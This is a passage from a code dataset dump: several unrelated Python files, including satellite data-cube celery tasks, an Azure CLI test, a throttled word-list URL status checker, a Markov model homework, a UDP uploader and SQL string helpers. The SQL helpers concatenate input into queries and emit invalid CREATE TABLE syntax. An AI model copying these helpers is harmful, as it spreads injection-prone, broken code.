sys.exit(1)\n\n\n def _run(self):\n \"\"\"Does the actual work of running the tested app. Called by test method\n and returns the exit code of app and anything in STDOUT.\n \"\"\"\n with subprocess.Popen(\n self._app, stderr=subprocess.PIPE,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE) as proc:\n out, _ = proc.communicate(\n input=self._input[self._test_no].encode(\"utf-8\"))\n\n try:\n return proc.returncode, out.decode(\"utf-8\") if out else None\n except UnicodeDecodeError as decode_exception:\n return proc.returncode, \\\n \"Serious execution badness: {}\".format(decode_exception)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"USAGE: test_parse_grades.py [1 | 2] to run tests 1 or 2\")\n else:\n TestDecomposer(int(sys.argv[1]) - 1)\n","sub_path":"Homework/hw1/test_decomposer.py","file_name":"test_decomposer.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566887572","text":"#\n# This file is part of Python Module for Cube Builder.\n# Copyright (C) 2019-2020 INPE.\n#\n# Cube Builder is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n#\n\n\"\"\"Define celery tasks for Cube Builder.\"\"\"\n\n# Python Native\nimport logging\nimport traceback\nfrom copy import deepcopy\n\n# 3rdparty\nfrom bdc_catalog.models import Collection, db\nfrom celery import chain, group\n\n# Cube Builder\nfrom ..celery import celery_app\nfrom ..constants import CLEAR_OBSERVATION_NAME, DATASOURCE_NAME, PROVENANCE_NAME, TOTAL_OBSERVATION_NAME\nfrom ..models import Activity\nfrom ..utils.image import create_empty_raster, match_histogram_with_merges\nfrom ..utils.processing import DataCubeFragments\nfrom ..utils.processing import blend as blend_processing\nfrom ..utils.processing import build_cube_path, compute_data_set_stats, get_or_create_model\nfrom ..utils.processing import merge as merge_processing\nfrom ..utils.processing import post_processing_quality, publish_datacube, publish_merge\n\n\ndef capture_traceback(exception=None):\n \"\"\"Retrieve stacktrace as string.\"\"\"\n return traceback.format_exc() or str(exception)\n\n\ndef create_execution(activity: dict) -> Activity:\n \"\"\"Create cube-builder activity and prepare celery execution.\n\n Args:\n activity - Cube Builder Activity dict\n\n Returns:\n Activity the cube build activity model\n \"\"\"\n where = dict(\n band=activity.get('band'),\n period=activity.get('period'),\n date=activity.get('date'),\n tile_id=activity.get('tile_id')\n )\n\n model, created = get_or_create_model(Activity, defaults=activity, **where)\n\n logging.debug('Activity {}, {}, {}, {} - {}'.format(model.tile_id, model.band, model.date,\n model.collection_id, created))\n\n return model\n\n\n@celery_app.task(queue='merge-cube')\ndef warp_merge(activity, band_map, force=False, **kwargs):\n \"\"\"Execute datacube merge task.\n\n This task consists in the following steps:\n\n **1.** Prepare a raster using dimensions of datacube GRS schema.\n **2.** Open collection dataset with RasterIO and reproject to datacube GRS Schema.\n **3.** Fill the respective pathrow into raster\n\n Args:\n activity - Datacube Activity Model\n force - Flag to build data cube without cache.\n\n Returns:\n Validated activity\n \"\"\"\n logging.warning('Executing merge {} - {}'.format(activity.get('warped_collection_id'), activity['band']))\n\n record = create_execution(activity)\n\n record.warped_collection_id = activity['warped_collection_id']\n merge_date = activity['date']\n\n tile_id = activity['tile_id']\n version = activity['args']['version']\n\n merge_file_path = None\n\n if activity['args'].get('reuse_datacube'):\n collection = Collection.query().filter(Collection.id == activity['args']['reuse_datacube']).first()\n\n if not force:\n # TODO: Should we search in Activity instead?\n merge_file_path = build_cube_path(collection.name, merge_date, tile_id,\n version=collection.version, band=record.band)\n\n if not merge_file_path.exists():\n # TODO: Should we raise exception??\n logging.warning(f'Cube {record.warped_collection_id} requires {collection.name}, but the file {str(merge_file_path)} not found. Skipping')\n raise RuntimeError(\n f\"\"\"Cube {record.warped_collection_id} is derived from {collection.name},\n but the file {str(merge_file_path)} was not found.\"\"\"\n )\n\n else:\n raise RuntimeError(\n f'Cannot use option \"force\" for derived data cube - {record.warped_collection_id} of {collection.name}'\n )\n\n if merge_file_path is None:\n merge_file_path = build_cube_path(record.warped_collection_id, merge_date,\n tile_id, version=version, band=record.band)\n\n if activity['band'] == band_map['quality'] and len(activity['args']['datasets']):\n kwargs['build_provenance'] = True\n\n reused = False\n\n # Reuse merges already done. Rebuild only with flag ``--force``\n if not force and merge_file_path.exists() and merge_file_path.is_file():\n efficacy = cloudratio = 0\n\n if activity['band'] == band_map['quality']:\n # When file exists, compute the file statistics\n efficacy, cloudratio = compute_data_set_stats(str(merge_file_path))\n\n reused = True\n\n activity['args']['file'] = str(merge_file_path)\n activity['args']['efficacy'] = efficacy\n activity['args']['cloudratio'] = cloudratio\n record.traceback = ''\n\n args = deepcopy(record.args)\n args.update(activity['args'])\n\n activity['args'] = args\n\n record.args = args\n record.save()\n else:\n record.status = 'STARTED'\n record.save()\n\n record.args = activity['args']\n\n try:\n args = deepcopy(activity.get('args'))\n args.pop('period', None)\n args['tile_id'] = tile_id\n args['date'] = record.date.strftime('%Y-%m-%d')\n args['cube'] = record.warped_collection_id\n\n empty = args.get('empty', False)\n\n # Create base directory\n merge_file_path.parent.mkdir(parents=True, exist_ok=True)\n\n if empty:\n # create empty raster\n file_path = create_empty_raster(str(merge_file_path),\n proj4=args['srs'],\n cog=True,\n nodata=args['nodata'],\n dtype='int16', # TODO: Pass through args\n dist=[args['dist_x'], args['dist_y']],\n resolution=[args['resx'], args['resy']],\n xmin=args['xmin'],\n ymax=args['ymax'])\n res = dict(\n file=str(file_path),\n efficacy=100,\n cloudratio=0,\n resolution=args['resx'],\n nodata=args['nodata']\n )\n else:\n res = merge_processing(str(merge_file_path), band_map=band_map, band=record.band, **args, **kwargs)\n\n merge_args = deepcopy(activity['args'])\n merge_args.update(res)\n\n record.traceback = ''\n record.status = 'SUCCESS'\n record.args = merge_args\n\n activity['args'].update(merge_args)\n except BaseException as e:\n record.status = 'FAILURE'\n record.traceback = capture_traceback(e)\n logging.error('Error in merge. Activity {}'.format(record.id), exc_info=True)\n\n raise e\n finally:\n record.save()\n\n logging.warning('Merge {} executed successfully. Efficacy={}, cloud_ratio={}'.format(\n str(merge_file_path),\n activity['args']['efficacy'],\n activity['args']['cloudratio']\n ))\n\n activity['args']['reused'] = reused\n\n return activity\n\n\n@celery_app.task(queue='prepare-cube')\ndef prepare_blend(merges, band_map: dict, **kwargs):\n \"\"\"Receive merges by period and prepare task blend.\n\n This task aims to prepare celery task definition for blend.\n A blend requires both data set quality band and others bands. In this way, we must group\n these values by temporal resolution and then schedule blend tasks.\n \"\"\"\n block_size = kwargs.get('block_size')\n\n activities = dict()\n\n # Prepare map of efficacy/cloud_ratio based in quality merge result\n quality_date_stats = {\n m['date']: (m['args']['efficacy'], m['args']['cloudratio'], m['args']['file'], m['args']['reused'])\n for m in merges if m['band'] == band_map['quality']\n }\n\n version = merges[0]['args']['version']\n\n for period, stats in quality_date_stats.items():\n _, _, quality_file, was_reused = stats\n\n # Do not apply post-processing on reused data cube since it may be already processed.\n if not was_reused:\n logging.info(f'Applying post-processing in {str(quality_file)}')\n post_processing_quality(quality_file, list(band_map.values()), merges[0]['warped_collection_id'],\n period, merges[0]['tile_id'], band_map['quality'], version=version, block_size=block_size)\n else:\n logging.info(f'Skipping post-processing {str(quality_file)}')\n\n def _is_not_stk(_merge):\n \"\"\"Control flag to generate cloud mask.\n\n This function is a utility to dispatch the cloud mask generation only for STK data cubes.\n \"\"\"\n return _merge['band'] == band_map['quality'] and not _merge['collection_id'].endswith('STK')\n\n for _merge in merges:\n # Skip quality generation for MEDIAN, AVG\n if _merge['band'] in activities and _merge['args']['date'] in activities[_merge['band']]['scenes'] or \\\n _is_not_stk(_merge):\n continue\n\n activity = activities.get(_merge['band'], dict(scenes=dict()))\n\n activity['datacube'] = _merge['collection_id']\n activity['warped_datacube'] = _merge['warped_collection_id']\n activity['band'] = _merge['band']\n activity['scenes'].setdefault(_merge['args']['date'], dict(**_merge['args']))\n activity['period'] = _merge['period']\n activity['tile_id'] = _merge['tile_id']\n activity['nodata'] = _merge['args'].get('nodata')\n activity['version'] = version\n # TODO: Check instance type for backward compatibility\n activity['datasets'] = _merge['args']['datasets']\n\n # Map efficacy/cloud ratio to the respective merge date before pass to blend\n efficacy, cloudratio, quality_file, _ = quality_date_stats[_merge['date']]\n activity['scenes'][_merge['args']['date']]['efficacy'] = efficacy\n activity['scenes'][_merge['args']['date']]['cloudratio'] = cloudratio\n\n if _merge['args'].get('reuse_datacube'):\n activity['reuse_datacube'] = _merge['args']['reuse_datacube']\n\n activity['scenes'][_merge['args']['date']]['ARDfiles'] = {\n band_map['quality']: quality_file,\n _merge['band']: _merge['args']['file']\n }\n\n if _merge['args'].get(DATASOURCE_NAME):\n activity['scenes'][_merge['args']['date']]['ARDfiles'][DATASOURCE_NAME] = _merge['args'][DATASOURCE_NAME]\n\n activities[_merge['band']] = activity\n\n # TODO: Add option to skip histogram.\n if kwargs.get('histogram_matching'):\n ordered_best_efficacy = sorted(quality_date_stats.items(), key=lambda item: item[1][0], reverse=True)\n\n best_date, (_, _, best_mask_file, _) = ordered_best_efficacy[0]\n dates = map(lambda entry: entry[0], ordered_best_efficacy[1:])\n\n for date in dates:\n logging.info(f'Applying Histogram Matching: Reference date {best_date}, current {date}...')\n for band, activity in activities.items():\n reference = activities[band]['scenes'][best_date]['ARDfiles'][band]\n\n if band == band_map['quality']:\n continue\n\n source = activity['scenes'][date]['ARDfiles'][band]\n source_mask = activity['scenes'][date]['ARDfiles'][band_map['quality']]\n match_histogram_with_merges(source, source_mask, reference, best_mask_file, block_size=block_size)\n\n # Prepare list of activities to dispatch\n activity_list = list(activities.values())\n\n datacube = activity_list[0]['datacube']\n\n # For IDENTITY data cube trigger, just publish\n if DataCubeFragments(datacube).composite_function == 'IDENTITY':\n task = publish.s(list(activities.values()))\n return task.apply_async()\n\n logging.warning('Scheduling blend....')\n\n blends = []\n\n # We must keep track of last activity to run\n # Since the Clear Observation must only be execute by single process. It is important\n # to avoid concurrent processes to write same data set in disk\n last_activity = activity_list[-1]\n\n # Trigger all except the last\n for activity in activity_list[:-1]:\n # TODO: Persist\n blends.append(blend.s(activity, band_map))\n\n # Trigger last blend to execute Clear Observation\n blends.append(blend.s(last_activity, band_map, build_clear_observation=True))\n\n task = chain(group(blends), publish.s(band_map, **kwargs))\n task.apply_async()\n\n\n@celery_app.task(queue='blend-cube')\ndef blend(activity, band_map, build_clear_observation=False, **kwargs):\n \"\"\"Execute datacube blend task.\n\n Args:\n activity - Datacube Activity Model.\n band_map - Band mapping with common_name and band original name.\n build_clear_observation - Generate band \"Clear Observation\".\n\n Returns:\n Validated activity\n \"\"\"\n block_size = kwargs.get('block_size')\n\n logging.warning('Executing blend - {} - {}'.format(activity.get('datacube'), activity.get('band')))\n\n return blend_processing(activity, band_map, build_clear_observation, block_size=block_size)\n\n\n@celery_app.task(queue='publish-cube')\ndef publish(blends, band_map, **kwargs):\n \"\"\"Execute publish task and catalog datacube result.\n\n Args:\n activity - Datacube Activity Model\n \"\"\"\n period = blends[0]['period']\n logging.info(f'Executing publish {period}')\n\n version = blends[0]['version']\n\n cube: Collection = Collection.query().filter(\n Collection.name == blends[0]['datacube'],\n Collection.version == version\n ).first()\n warped_datacube = blends[0]['warped_datacube']\n tile_id = blends[0]['tile_id']\n reused_cube = blends[0].get('reuse_datacube')\n\n # Retrieve which bands to generate quick look\n bands = cube.bands\n band_id_map = {band.id: band.name for band in bands}\n\n quicklook = cube.quicklook[0]\n\n quick_look_bands = [band_id_map[quicklook.red], band_id_map[quicklook.green], band_id_map[quicklook.blue]]\n\n merges = dict()\n blend_files = dict()\n\n composite_function = DataCubeFragments(cube.name).composite_function\n\n quality_blend = None\n\n for blend_result in blends:\n if composite_function != 'IDENTITY':\n blend_files[blend_result['band']] = blend_result['blends']\n\n if blend_result.get('clear_observation_file'):\n blend_files[CLEAR_OBSERVATION_NAME] = {composite_function: blend_result['clear_observation_file']}\n\n if blend_result.get('total_observation'):\n blend_files[TOTAL_OBSERVATION_NAME] = {composite_function: blend_result['total_observation']}\n\n if blend_result.get('provenance'):\n blend_files[PROVENANCE_NAME] = {composite_function: blend_result['provenance']}\n\n if blend_result.get('datasource'):\n blend_files[DATASOURCE_NAME] = {composite_function: blend_result['datasource']}\n\n for merge_date, definition in blend_result['scenes'].items():\n merges.setdefault(merge_date, dict(datasets=definition.get('datasets', definition.get('dataset')),\n cloudratio=definition['cloudratio'],\n ARDfiles=dict()))\n merges[merge_date]['ARDfiles'].update(definition['ARDfiles'])\n\n if blend_result['band'] == band_map['quality']:\n quality_blend = blend_result\n\n if composite_function != 'IDT':\n cloudratio = quality_blend['cloudratio']\n\n # Generate quick looks for cube scenes\n publish_datacube(cube, quick_look_bands, tile_id, period, blend_files, cloudratio, band_map, **kwargs)\n\n # Generate quick looks of irregular cube\n wcube = Collection.query().filter(Collection.name == warped_datacube, Collection.version == version).first()\n\n if not reused_cube:\n for merge_date, definition in merges.items():\n publish_merge(quick_look_bands, wcube, tile_id, merge_date, definition, band_map)\n\n try:\n db.session.commit()\n except:\n db.session.rollback()\n","sub_path":"cube_builder/celery/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":16345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"51301666","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport os\nimport unittest\n\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)\n\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass AgsScenarioTest(ScenarioTest):\n\n @ResourceGroupPreparer(name_prefix='cli_test_amg')\n def test_amg_e2e(self, resource_group):\n\n self.kwargs.update({\n 'name': 'clitestamg',\n 'location': 'westeurope'\n })\n\n self.cmd('grafana create -g {rg} -n {name} -l {location} --tags foo=doo --skip-role-assignments', checks=[\n self.check('tags.foo', 'doo'),\n self.check('name', '{name}')\n ])\n self.cmd('grafana list -g {rg}')\n count = len(self.cmd('grafana list').get_output_in_json())\n self.cmd('grafana show -g {rg} -n {name}', checks=[\n self.check('name', '{name}'),\n self.check('resourceGroup', '{rg}'),\n self.check('tags.foo', 'doo')\n ])\n\n self.cmd('grafana delete -g {rg} -n {name} --yes')\n final_count = len(self.cmd('grafana list').get_output_in_json())\n self.assertTrue(final_count, count - 1)","sub_path":"src/amg/azext_amg/tests/latest/test_amg_scenario.py","file_name":"test_amg_scenario.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"364387305","text":"from random import randint\nfrom sys import argv\nfrom time import sleep, time\n\nfrom requests import get\n\nMAX_WORD_LENGTH = 0\nVERBOSE = True\n\n\ndef wait(minimum: int = 5, maximum: int = 8) -> None:\n random_number = randint(minimum, maximum)\n if VERBOSE:\n print(f\"[helpers:wait] Sleeping for {random_number} sec...\")\n sleep(random_number)\n if VERBOSE:\n print(f\"[helpers:wait] Done.\")\n\n\ndef is_full_url(url: str) -> bool:\n if \"https://\" in url or \"http://\" in url:\n if VERBOSE:\n print(\"[helpers:is_full_url] This URL is full, with schema.\")\n return True\n if VERBOSE:\n print(\n \"[helpers:is_full_url] This URL is not full, just domain name.\"\n )\n return False\n\n\nurl = argv[1]\nfile_path = argv[2]\n\nif not is_full_url(url):\n url = f\"https://{url}{'' if url.endswith('/') else '/'}\"\nelse:\n if not url.endswith(\"/\"):\n url += \"/\"\n\nwith open(file_path) as openfile:\n words = [\n word.strip()\n for word in openfile.readlines()\n if word.strip()\n ]\n if VERBOSE:\n print(f\"[__main__] Readed {len(words)} words from file:\\n{words}\")\n\nresult = {\n \"ok\": list(),\n \"not_ok\": list(),\n \"time_token_requests\": 0,\n \"time_token_with_requests_and_waits\": 0,\n}\n\nfor idx, word in enumerate(words, 1):\n\n if len(word) > MAX_WORD_LENGTH:\n MAX_WORD_LENGTH = len(word)\n\n start_time = time()\n try:\n if VERBOSE:\n print(\n f\"[__main__] Making request to the URL address: {url + word}\"\n )\n response = get(url + word)\n except Exception as e:\n raise Exception(f\"Bad URL.\\nMore data of exception: {e}\")\n request_end_time = time()\n if response.status_code == 200:\n if VERBOSE:\n print(f\"[__main__] {word} --- OK.\")\n result[\"ok\"].append(word)\n else:\n if VERBOSE:\n print(f\"[__main__] {word} --- NOT OK!\")\n result[\"not_ok\"].append(word)\n\n # Check for last item, if it's then don't call wait() \n # function for save time\n if not idx == len(words) - 1:\n wait()\n\n # Timing\n end_time_with_request_and_wait = time()\n result[\"time_token_requests\"] += request_end_time - start_time\n result[\"time_token_with_requests_and_waits\"] += end_time_with_request_and_wait - start_time\n\nwith open(file_path + \"_result\", \"w\") as openfile:\n if VERBOSE:\n print(\"[__main__] Writing file with results...\")\n openfile.write(\n f\"\\nRESULTS OF DATA FROM FILE: {file_path}\\n\\n\"\n f\"Requests time token: {result['time_token_requests']} sec.\\n\"\n f\"Total time (with waits): {result['time_token_with_requests_and_waits']} sec.\\n\"\n f\"Free addresses number: {len(result['not_ok'])}\\n\"\n f\"Taken addresses number: {len(result['ok'])}\\n\"\n f\"Total address number: {len(words)}\\n\\n\"\n )\n\n if VERBOSE:\n print(\"[__main__] Writing addresses that have 200 status...\")\n openfile.write(\"OK:\\n\\n\")\n for word in result[\"ok\"]:\n openfile.write(\n f\"{word} {' ' * (MAX_WORD_LENGTH - len(word))} [{url + word}]\\n\"\n )\n\n if VERBOSE:\n print(\"[__main__] Writing addresses that haven't 200 status...\")\n openfile.write(\"\\nNOT OK:\\n\\n\")\n for word in result[\"not_ok\"]:\n openfile.write(\n f\"{word} {' ' * (MAX_WORD_LENGTH - len(word))} [{url + word}]\\n\"\n )\n\nif VERBOSE:\n print(\"[__main__] Done!\")\n","sub_path":"200_status_finder/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"458495096","text":"# -*- coding: utf-8 -*-\n#------------------------------------------------------------------\n# LEIA E PREENCHA O CABEÇALHO \n# NÃO ALTERE OS NOMES DAS FUNÇÕES\n# NÃO APAGUE OS DOCSTRINGS\n# NÃO INCLUA NENHUM import ...\n#------------------------------------------------------------------\n\n'''\n\n Nome: Guilherme Zorzon\n NUSP: 10333380\n\n Ao preencher esse cabeçalho com o meu nome e o meu número USP,\n declaro que todas as partes originais desse exercício programa (EP)\n foram desenvolvidas e implementadas por mim e que portanto não \n constituem desonestidade acadêmica ou plágio.\n Declaro também que sou responsável por todas as cópias desse\n programa e que não distribui ou facilitei a sua distribuição.\n Estou ciente que os casos de plágio e desonestidade acadêmica\n serão tratados segundo os critérios divulgados na página da \n disciplina.\n Entendo que EPs sem assinatura devem receber nota zero e, ainda\n assim, poderão ser punidos por desonestidade acadêmica.\n\n Abaixo descreva qualquer ajuda que você recebeu para fazer este\n EP. Inclua qualquer ajuda recebida por pessoas (inclusive\n monitores e colegas). Com exceção de material de MAC0110, caso\n você tenha utilizado alguma informação, trecho de código,...\n indique esse fato abaixo para que o seu programa não seja\n considerado plágio ou irregular.\n\n Exemplo:\n\n A monitora me explicou que eu devia utilizar a função int() quando\n fazemos leitura de números inteiros.\n\n A minha função quicksort() foi baseada na descrição encontrada na \n página https://www.ime.usp.br/~pf/algoritmos/aulas/quick.html.\n\n Descrição de ajuda ou indicação de fonte:\n\n'''\n#------------------------------------------------------------------\nclass MarkovModel:\n\n def __init__(self, k, corpus):\n\n self.corpus = corpus\n self.k = k\n \n str_temp = corpus #String temporária para que possa ser modificada\n cont = 0 \n vet_alphab = [] #vetor que guarda as letras do alfabeto\n\n while(len(str_temp) > 0):\n i = 0\n while( i < len(vet_alphab) and str_temp[0] >= vet_alphab[i]): #faz com que o vetor fique ordenado em ordem crescente\n i += 1\n vet_alphab.insert(i, str_temp[0])\n str_temp = str_temp.replace(str_temp[0], \"\") #tira as letras já vista da string temporária\n cont += 1\n\n self.no_simb = cont\n self.alph = vet_alphab\n self.circular = self.corpus + self.corpus[0:self.k] #Crio uma string circular cortando só o que preciso de corpus e adicionando ao final\n\n def alphabet(self):\n string = \"'\"\n for char in self.alph: #Crio a string apenas para atender ao padrão de saída imposto no EP\n string += char\n\n string += \"'\"\n return string\n \n\n def N(self, t):\n conta_seq = 0\n if(len(t) != (self.k) and len(t) != (self.k + 1)):\n return None\n \n for i in range(len(self.corpus)):\n var = True\n for j in range(len(t)):\n if(t[j] != self.circular[j + i]):\n var = False\n if(var == True):\n conta_seq += 1\n\n if(conta_seq == 0): #Se a string se encaixar nos padrões pedidos (len = k ou k+1) e não se encontrar em self.corpus, na verdade ela deve retornar None\n return None\n return conta_seq\n\n\n def laplace(self, t):\n if(len(t) != (self.k + 1)):\n return None\n temp = t[:-1] #Crio uma string de tamanho k para obter N(pal)\n s1 = self.N(t) #N(pal + c)\n s2 = self.N(temp) #N(pal)\n if(s1 == None):\n s1 = 0\n if(s2 == None):\n s2 = 0\n \n return (s1 + 1)/(s2 + len(self.alph)) #len(self.alph) é o tamanho do vetor que contém as letras do alfabeto ( = A)\n\n\n def __str__(self):\n vec_comparak = []\n vec_comparak2 = []\n \n string = \"alfabeto tem \" + str(len(self.alph)) + \" símbolos\\n\"\n \n #Os dois laços abaixo criam dois vetores com todos as strings t de len = k ou k+ 1\n #ordenados em ordem alfabética, sem repetição\n for i in range(len(self.corpus)):\n j = self.circular[i: i+self.k]\n m = 0\n while(m < len(vec_comparak) and j > vec_comparak[m]): #coloca em ordem alfabética\n m += 1\n if(m == len(vec_comparak) or j != vec_comparak[m]): #garante que não há repetição\n vec_comparak.insert(m, j)\n\n for i in range(len(self.corpus)):\n j = self.circular[i: i+self.k+1]\n m = 0\n while(m < len(vec_comparak2) and j > vec_comparak2[m]):\n m += 1\n if( m == len(vec_comparak2) or j != vec_comparak2[m]):\n vec_comparak2.insert(m, j)\n \n for i in range(len(vec_comparak)):\n string += '\"' + vec_comparak[i] + '\" ' + str(self.N(vec_comparak[i])) + \"\\n\"\n for i in range(len(vec_comparak2)):\n string += '\"' + vec_comparak2[i] + '\" ' + str(self.N(vec_comparak2[i])) + \"\\n\"\n \n return string\n \n#------------------------------------------------------------------\ndef main():\n corpus1 = \"aabcabaacaac\"\n corpus2 = \"babababaabababaabaabaaaaaababaaaab\"\n corpus3 = \"Como é bom estudar MAC0122!\"\n print(\"corpus1: \\n\" + corpus1)\n print(\"corpus2: \\n\" + corpus2)\n print(\"corpus3: \\n\" + corpus3)\n print()\n \n modelo1 = MarkovModel(2, corpus1)\n modelo2 = MarkovModel(4, corpus2)\n modelo3 = MarkovModel(0, corpus3)\n\n print(modelo1)\n print()\n print(modelo2)\n print()\n print(modelo3)\n print()\n\n print(\"alfabeto 1: \\n\" + modelo1.alphabet())\n print(\"alfabeto 2: \\n\" + modelo2.alphabet())\n print(\"alfabeto 3: \\n\" + modelo3.alphabet())\n print()\n\n print(\"N de 'aa' para o modelo1: \" + str(modelo1.N(\"aa\")))\n print(\"N de 'aab' para o modelo1: \" + str(modelo1.N(\"aab\")))\n print(\"N de 'aaa' para o modelo1: \" + str(modelo1.N(\"aaa\")))\n print(\"N de 'baaa' para o modelo2: \" + str(modelo2.N(\"baaa\")))\n print(\"N de 'aabaa' para o modelo1: \" + str(modelo2.N(\"aabaa\")))\n print()\n\n print(\"laplace de 'aaa' para modelo1: \\n\" + str(modelo1.laplace(\"aaa\")))\n print(\"laplace de 'aab' para modelo1: \\n\" + str(modelo1.laplace(\"aab\")))\n print(\"laplace de 'aac' para modelo1: \\n\" + str(modelo1.laplace(\"aac\")))\n print()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n \n\n \n \n \n \n \n\n\n\n\n\n\n\n\n\n \n","sub_path":"markov_model.py","file_name":"markov_model.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"22079682","text":"import io\nimport socket\nimport pickle\nimport threading\nimport time\nimport Packets\nfrom collections import deque\n\nclass ThreadACK (threading.Thread):\n def __init__(self, connection):\n threading.Thread.__init__(self)\n self.connection = connection\n self.lastPacketNum = -1\n self.numberOfPacket = 2147483647\n self.missingPacket = False\n self.missingPacketNum = -1\n self.finishRecvACK = False\n def run(self):\n\n timeSinceLastACK = 0\n startedWaiting = False\n\n while True:\n recvMessage = self.connection.recvfrom(1024)\n recvPacketNum = int(recvMessage[0].decode())\n\n if recvPacketNum == self.numberOfPacket - 1:\n self.finishRecvACK = True\n break\n\n if recvPacketNum == self.lastPacketNum and self.missingPacket == False:\n print(\"ERROR ACK no\", recvPacketNum, \"from I.P.\", recvMessage[1][0], \"port\", recvMessage[1][1])\n self.missingPacketNum = recvPacketNum\n self.missingPacket = True\n\n if recvPacketNum % 10 == 0:\n print(\"Received ACK no\", recvPacketNum, \"from I.P.\", recvMessage[1][0], \"port\", recvMessage[1][1])\n\n self.lastPacketNum = recvPacketNum\n\n\ndef sendPacket(myPacket, connectionSocket, address):\n try:\n if isinstance(myPacket, Packets.DataPacket):\n if myPacket.id % 10 == 0:\n print(\"Sending packet no\", myPacket.id, \"to I.P.\", address[0], \"port\", address[1])\n pickleString = pickle.dumps(myPacket)\n connectionSocket.sendto(pickleString, address)\n except OSError:\n pass\n except pickle.PicklingError as e:\n print(\"Pickle error({0})\".format(e))\n\ndef resendPacket(fromPacketNum, dataWindow, connectionSocket, address):\n for packet in dataWindow:\n if packet.id > fromPacketNum:\n print(\"RESEND packet no \", packet.id)\n sendPacket(packet, connectionSocket, address)\n\ndef upload(sendDestinationAddress, connectionSocket, fileName):\n threadAck = ThreadACK(connectionSocket)\n\n packetNum = 0\n dataWindow = deque([])\n finishReading = False\n startedWaiting = False\n startedWaitingTimeout = False\n\n with open(fileName, \"rb\") as fileStream: # rb for read byte\n threadAck.start()\n\n while not threadAck.finishRecvACK:\n try:\n if threadAck.missingPacket:\n resendPacket(threadAck.missingPacketNum, dataWindow, connectionSocket, sendDestinationAddress)\n threadAck.missingPacket = False\n\n ### DATA WINDOW ###\n if packetNum > threadAck.lastPacketNum + 8:\n\n if not startedWaitingTimeout:\n timeSinceLastACK = time.process_time()\n startedWaitingTimeout = True\n elif time.process_time() - timeSinceLastACK > 120: # time before resending from last ACK packet\n startedWaitingTimeout = False\n break\n\n if not startedWaiting:\n timeSinceLastResend = time.process_time()\n startedWaiting = True\n elif time.process_time() - timeSinceLastResend > 5: # time before resending from last ACK packet\n resendPacket(threadAck.lastPacketNum, dataWindow, connectionSocket, sendDestinationAddress)\n startedWaiting = False\n continue\n\n startedWaitingTimeout = False\n\n if dataWindow and dataWindow[0].id < threadAck.lastPacketNum:\n dataWindow.popleft()\n ###################\n\n if not finishReading:\n\n myPacket = Packets.DataPacket(packetNum, fileStream.read(900))\n\n if not myPacket.data:\n threadAck.numberOfPacket = packetNum\n finishReading = True\n continue\n\n dataWindow.append(myPacket)\n packetNum += 1\n\n # time.sleep(0.05)\n\n sendPacket(myPacket, connectionSocket, sendDestinationAddress)\n\n except IOError as e:\n print(\"I/O error({0})\".format(e))\n break\n\n print(\"Number of Packet:\", packetNum)\n\n #### CLOSE ####\n closingPacket = Packets.ClosingPacket()\n sendPacket(closingPacket, connectionSocket, sendDestinationAddress)\n ###############\n\n\n threadAck.join()\n\n fileStream.close()\n","sub_path":"Upload.py","file_name":"Upload.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"97487422","text":"import sqlite3\nfrom basic_tables import *\n\n__author__ = \"Albert Yu\"\n\n\ndef str_tuple(list_of_cols):\n \"\"\"\n Transforms a list [item1, item2, etc.] into a string of the tuple form \"(item 1, item 2, etc.)\" so\n that it can be concatenated into an SQL query.\n :param list_of_cols: a list, may contain different types\n :return: a string representation of a tuple containing the items\n \"\"\"\n return str(tuple(list_of_cols))\n\n\ndef create_table(table_name, list_of_cols):\n \"\"\"\n Creates the string command for the SQL query for creating a new table\n NOTE: the table name should NOT have a space. This will cause errors.\n :param table_name: a string representing the table name\n :param list_of_cols: optional parameter, giving a list of the desired column names. None type by default.\n :return: string\n \"\"\"\n return \"CREATE TABLE \" + table_name + \" IF NOT EXISTS \" + table_name + ' (' + ', '.join(list_of_cols) + ')'\n\n\ndef del_table(table):\n \"\"\"\n Creates the string form of the SQL query for deleting a table\n :param table:\n :return: string\n \"\"\"\n return \"DROP TABLE \" + table\n\n\ndef add_column(table, column_name):\n \"\"\"\n Returns the string form of the SQL query that appends the given column to the end of a table\n :param table:\n :param column_name:\n :return: string\n \"\"\"\n return \"ALTER TABLE \" + table + \" ADD COLUMN \" + column_name\n\n\ndef insert_data(table, list_of_data):\n \"\"\"\n Returns the SQL command for inserting a row of data into a given table\n :param table:\n :param list_of_data:\n :return: string command\n \"\"\"\n return \"INSERT INTO \" + table + \" VALUES \" + str_tuple(list_of_data)\n\n\ndef del_data(table, condition=\"\"):\n \"\"\"\n Deletes rows of the table with the optional specified condition\n :param table: the string that represents the name of the table\n :param condition: the string rep of necessary condition for something to be deleted\n (e.g. 'ID = 5', where 'ID' is a column name of the table)\n :return: string command\n \"\"\"\n if len(condition) == 0:\n return \"DELETE FROM \" + table\n else:\n return \"DELETE FROM \" + table + \" WHERE \" + condition\n\n\ndef select_all(table, order_by=\"\"):\n \"\"\"\n SQL query to select all rows of a table\n :param table:\n :param order_by: column parameter to order by\n :return: string\n \"\"\"\n if len(order_by) == 0:\n return \"SELECT * FROM \" + table\n else:\n return \"SELECT * FROM \" + table + 